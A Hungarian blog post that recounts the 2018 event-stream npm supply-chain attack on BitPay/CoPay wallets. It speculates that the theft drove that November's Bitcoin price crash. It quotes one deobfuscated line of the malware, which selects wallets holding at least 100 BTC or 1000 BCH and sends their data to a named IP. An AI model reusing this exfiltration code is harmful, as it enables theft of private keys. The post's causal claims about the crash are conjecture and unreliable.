Sokszor illetjük a cryptopiacokat azzal a jelzővel, hogy mennyire gyerekcipőben járnak még és a kiforratlansága okán nagyon sok kár érheti a gyanútlan felhasználókat… pedig valóban ez a kiforratlanság nem cryptospecifikus, az Internet és annak technológiái olyan szinten gyorsan fejlődnek, hogy ami ma még gyerekcipőben járó újdonság, az holnapra már elunt és kihal szemétdomb lesz csak. Erre keresve sem lehetne jobb példát mutatni eme cikk témájánál.

Néha komolyan elgondolkodom, hogy mi is hajt abban, hogy blogoljak a crypto témában, hiszen itt nem történik semmi. Az árfolyamok is csak vagy felfelé száguldoznak, vagy lefelé zuhannak. Persze vannak jó dolgok is, de igazából azokkal is csak a jéghegy csúcsát kapargatjuk. Majd egyszer csak történik valami meglepő és ráébredek, hogy miért is blogolok: azért mert olyan szinten hihetetlen az ami itt nap mint nap történik, hogy az ember kénytelen azt kiírni magából.

Az elmúlt hetekben két nagyon fontos és látványos dolog történt, amire jómagam is ráfókuszáltam: A híres neves bch hashwar és ugye a jelentős árfolyamzuhanás ami kapcsán a BTC árfolyama alig egy hét alatt dropolt 40%-ot, ami azért még a magamfajta flashcrasheken edződött “veteránnak” is sokkoló volt. Az egészben az izgalmas kibogozni a történetek mögött meghúzódó fura történetszálakat. Mi kell ahhoz, hogy egy egyébként lassú növekedés hipersebességre kapcsoljon? (ICOk) Mi kell ahhoz, hogy a növekedés ne törjön meg a dumpolásokkal? (Tether) Miért tetőzik az árfolyam pont 19k körül (hülye kerek számok + karácsonyi news adaptáció), miért törik meg és tesztel vissza 6,5k-n az árfolyam majd egy évig a bezuhanás előtt? (fibo+kapituláció) És még hosszan lehete sorolni ezeket a történeteket. Persze mikroszinten is vannak igazán izgalmas témák, lásd tavaly a BCH hardfork, vagy az az követő megannyi sikertelen flipening try.

És akkor eljutunk szépen lassan az idei nov 15-höz, ahol is összecsaptak az elementáris erők és a nagy hashwar keretei között a “dögöljön meg a szomszéd tehene” elvet vallva… szépen kinyírták maguk körül a piacot, hiszen pont ezt ígérték…

Vagy mégsem? Lehet, hogy a nagy színház mögött valójában egy teljesen banális történet húzódik meg és újra kiderül, hogy nincs itt semmi nagy összeesküvés és világmegváltó kísérlet, csak egyesek megint jókor jó helyen próbálták előadni, hogy mekkora sztárok és egyszerűen csak bemákolták a dolgot?

Nos úgy néz ki, hogy Jihan és CSW kakasviadalába valaki(k) nagyon belerondított(ak). Olyan szinten, hogy az feltételezhetően még a két ellenérdekelt felet is meglepte és nem kizárt, hogy a hirtlen fegyverletétel is ennek az eseménynek köszönhető.

A újabb mozaikkal 3 napja találkoztam egy twitter bejegyzés kapcsán, amikor is szint azonnal blogbejegyzést akartam róla írni, de úgy voltam vele, hogy előbb had tisztuljon a kép. Mára végre ki is tisztult…

Néhány napja került elő egy nagyon fura AES kódolt malware az egyik népszerű node.js projektben, egészen pontosan az event-streamben:

Az encrypted payload kidobozásához relatív sok idő kellett, de tegnapra már egészen biztos volt, hogy valamilyen cryptocurrency érintett kód lehet benne, ami a BitPay/CoPay népszerű payment provider alkalmazásokhoz kapcsolódik.

Ezen a ponton fontos megjegyezni, hogy a kérdéses NPM filenak semmi köze nincs a cryptovilághoz. Ez a library a teljes node.js univerzum egyik alapköve, napi szinten több százezerszer töltik le különböző projektek lefordításához. A helyzet úgy alakul, hogy az “event-stream” fejlesztője (dominictarr) egy jó ideje már nem fejleszti az event-streamet és nemrégiben jelentkezett nála egy “right9ctrl” nevű github felhasználó, hogy szívesen átvenné a repo karbantartását, amit dominic minden gond nélkül át is adott. A karbantartásból annyi lett, hogy bekerült a malware kód a libraryba (hogy egészen pontos legyek right9ctrl behivatkozott egy másik libet (flatmap-stream), ami a malwaret tartalmazta.

Oké, nézzük mi is ez a malware: Mivel egy eléggé komplex trükközésről van szó és egészen sokáig inkább a tűzoltással foglalkozott mindenki, ezért lényegében csak tegnapra derült ki, hogy pontosan mit is csinál az injektált malware kód. A kód legszebb része:

t.balance = parseFloat(e.balance.split(" ")[0]), "btc" == t.coin && t.balance < 100 || "bch" == t.coin && t.balance < 1e3 || (global.CSSMap[t.xPubKey] = !0, r("c", JSON.stringify(t)))

A rosszindulatú kód belehívott a BitPay/CoPay profilejába (Credentials.getKeys) és megnézte, hogy van-e ott legalább 100 BTC-t, vagy 1000 BCH-t tartalmazó wallet, ha igen, akkor nemes egyszerűséggel elküldte a privát kulcsot egy Kuala Lumpur-i (111.90.151.134) szerver 8000-es portján figyelő szolgáltatásnak.

Közeledünk a konklúzióhoz… A kérdéses malware payloadet right9ctrl szeptember 9-én commitolta az event-stream libraryba és azóta várakozott, hogy végre készítsem egy új buildet a BitPay/CoPay. Ez majd 2 hónap múlva meg is történt (ami alatt senki az égvilágon nem vette észre a beágyazott kódot…), amikor is november 13-án éjszaka végre kihozta a BitPay v5.0.2 stabil buildet és hogy mi történt nem sokkal ezután a piacokon. Mutatom:

Alig 12 órával a BitPay release után már be is szakadt az árfolyam 1000 dollárt, majd 3 napnyi szünet után szinte azonnal további 1500 dollárt. A nagyobb szakadások szabályszerűsége arra enged következtetni, hogy a támadó kötegelten dolgozta fel a privát kulcsokat, amibe bejátszott az is, hogy a felhasználók is csak a release után némi idővel (napokkal) rakják fel az újabb verziókat.

Hogy mennyit lopott el a támadó és mennyit dumpolt le? Erről egyelőre mégcsak találgatások vannak. De azok hajmeresztőek…

Illő lenne így a cikk végére valami konklúziót összerakni: Egyrészt a támadó nagyon alapos munkát végzett. Volt itt minden, social engineering (dominic megtévesztése), aes256 payload összerakása, copay lib visszafejtése és a tesztelés, kuala lumpuri szerver bérlés, a begyűjtött privát kulcsok dumpolása és flash cashout tőzsdéken, amihez tippre a hamisan KYC-zott  usereket már jó előre létrehozta, de a legérdekesebb, hogy eleve csak a nagyhalakra ment, csak azon walleteket dumpolta, amiben legalább 100 BTC és 1000 BCH állt, szóval eleve kizárta a “kispénzek” lenyúlását, hogy ezzel is – feltételezem – maximalizálja a bevételt. Ráadásul ezt az egészet két hónapon keresztül fenntartotta, mire aratni tudott. A hab a tortán már csak az volt, hogy a BitPay pont aznap hozta ki a hackelt libet, amikor indult a hashwar… szóval lényegében úgy tudta dumpolni a teljes ellopott vagyont, hogy ezen lényegében senki nem is csodálkozott, hiszen… lényegében pont ezt is vártuk. Ha megéri a Bitcoin, hogy olyan filmek készüljenek róla mint a “Margin Call” vagy a “Too Big To Fail”… akkor biztosra veszem, hogy ez a kis történt fog kapni néhány jelenetet.

Hogy mi múlott ezen?

  • Túl majd 3000 dolláros árfolyam zuhanáson és az ezáltal okozott újabb sokkon és brutális bizalomvesztésen…
  • A Bakkt 4 napja bejelentette, hogy elhalasztja a Bitcoin Futures bevezetését és feltehetően csak 2019Q1-ben rukkol elő ezzel
  • Egyes pletykák szerint a szinte már biztosra vehető Bitcoin ETF kapcsán is  komoly kételyek merültek fel újra
  • A nagy hashwarból sem lett semmi. Ahelyett, hogy a két fél hónapokon keresztül gyilkolta volna egymást alig 1 hét alatt kapitulált mindkét oldal és most két walking dead cammog a Bitcoin Cashesebb oldalán ezzel végtelen mennyiségű popcornt hagyva elfogyasztatlanul.

Cserébe viszont volt egy Crypto Black Fridayünk…

 

 

Source: Variance

Leave a comment

Az email címet nem tesszük közzé. A kötelező mezőket * karakterrel jelöltük

%d blogger ezt szereti: